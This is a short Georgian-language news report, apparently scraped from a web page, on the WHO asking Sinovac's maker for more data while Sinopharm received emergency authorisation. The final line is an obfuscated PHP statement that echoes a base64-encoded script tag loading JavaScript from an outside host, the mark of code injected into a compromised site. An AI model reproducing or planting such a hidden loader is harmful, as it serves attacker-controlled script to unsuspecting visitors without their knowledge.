celsiusi
ავერსი საქკაბელი
ჯანდაცვის მსოფლიო ორგანიზაციის ექსპერტებმა კიდევ ერთი ჩინური ვაქცინის „სინოვაკის“ შესახებ მწარმოებლისგან დამატებითი ინფორმაცია მოითხოვეს, რათა ამ კონკრეტულ ვაქცინასთან დაკავშირებით რეკომენდაცია გასცენ.
 
შესაბამისი განცხადება ჯანმო-ს ხელმძღვანელების პრესკონფერენციაზე მრჩეველთა ჯგუფის ხელმძღვანელმა არნოდ დიდიელორანმა გააკეთა, როდესაც კითხვა დაისვა „სინოვაკის“ ავტორიზაციასთან დაკავშირებით არსებობს თუ არა რაიმე სიახლე.
 
„ჩვენ დავიწყეთ „სინოვაკის“ ანგარიშის შესწავლა. რეალურად, ჩვენ მწარმოებლისგან წერილობით მოვითხოვეთ დამატებითი ინფორმაცია. ჩვენ ველოდებით პასუხს. ჩვენი საქმიანობის ნაწილია მონაცემების შეფასება. ჩვენ გვქონდა მიზეზი, რომ მოგვეთხოვა დამატებითი ინფორმაცია. იმედი გვაქვს, რომ მას მალე მივიღებთ, რათა გავცეთ რეკომენდაცია ამ კონკრეტულ ვაქცინასთან დაკავშირებით“, - განაცხადა მან.
 
შეგახსენებთ, დღეს ცნობილი გახდა, რომ ჯანდაცვის მსოფლიო ორგანიზაციამ ჩინური წარმოების კორონავირუსის საწინააღმდეგო ვაქცინა „სინოფარმს“ გადაუდებელი მოხმარებისთვის ავტორიზაცია მიანიჭა.
1092
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");